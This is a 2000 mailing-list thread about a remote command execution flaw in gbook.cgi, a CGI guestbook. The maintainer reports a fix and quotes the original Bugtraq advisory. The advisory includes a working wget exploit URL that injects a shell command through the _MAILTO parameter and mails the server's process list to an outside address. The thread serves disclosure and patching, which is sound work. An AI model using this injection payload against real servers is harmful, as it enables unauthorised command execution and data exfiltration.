Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED]

[William Kendrick <nbs () SONIC NET>]

So far as I can tell, it's fixed...  Please let me know if anyone
sees any other glaring holes.  It IS rather ancient software.

-bill!

Forwarded message:
> From mbrennen () fni com  Sat Nov 11 10:28:17 2000
> X-envelope-info: <mbrennen () fni com>
> Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
> From: Michael Brennen <mbrennen () fni com>
> To: William Kendrick <nbs () sonic net>
> Cc: mat () hacksware com
> Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability
>  (fwd)
> In-Reply-To: <200011110920.eAB9KVL11974 () sonic net>
> Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000 () henry fni com>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
> You might want to post this to bugtraq.
>
>    -- Michael
>
>
> On Sat, 11 Nov 2000, William Kendrick wrote:
>
> > Should be fixed, thanks.
> >
> > I wonder why I wasn't informed directly!  My @zippy.sonoma.edu address
> > _should_ still be getting forwarded to my new addr.
> >
> > New download available at:
> >
> >   ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz
> >
> > Modification date: November 11, 2000.
> >
> > -bill!
> >
> > > Don't know if you saw this or not; you probably have by now.  There
> > > are a couple of vulnerable sprintf() also that should be replaced by
> > > snprintf().
> > >
> > >    -- Michael
> > >
> > >
> > > ---------- Forwarded message ----------
> > > Date: Fri, 10 Nov 2000 20:38:44 +0900
> > > From: JW Oh <mat () IVNTECH COM>
> > > To: BUGTRAQ () SECURITYFOCUS COM
> > > Subject: [hacksware] gbook.cgi remote command execution vulnerability
> > >
> > >    Bug Report
> > >
> > > 1. Name: gbook.cgi remote command execution vulnerability
> > > 2. Release Date: 2000.11.10
> > > 3. Affected Application:
> > >   GBook - A web site guestbook
> > >      By Bill Kendrick
> > >      kendrick () zippy sonoma edu
> > >      http://zippy.sonoma.edu/kendrick/
> > > 4. Author: mat () hacksware com
> > > 5. Type: Input validation Error
> > >
> > > 6. Explanation
> > >  gbook.cgi is used by some web sites.
> > >  We can set _MAILTO parameter, and popen is called to execute mail command.
> > >  If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
> > >  It's so trivial. :)
> > > 7. Exploits
> > >  This exploit executes "ps -ax" command and sends the result to haha () yaho com.
> > >
> > >  wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha () yaho 
> > > com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe () 
> > > yaho com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few";
> > >
> > >
> > > =================================================
> > > |               mat () hacksware com               |
> > > |             http://hacksware.com              |
> > > =================================================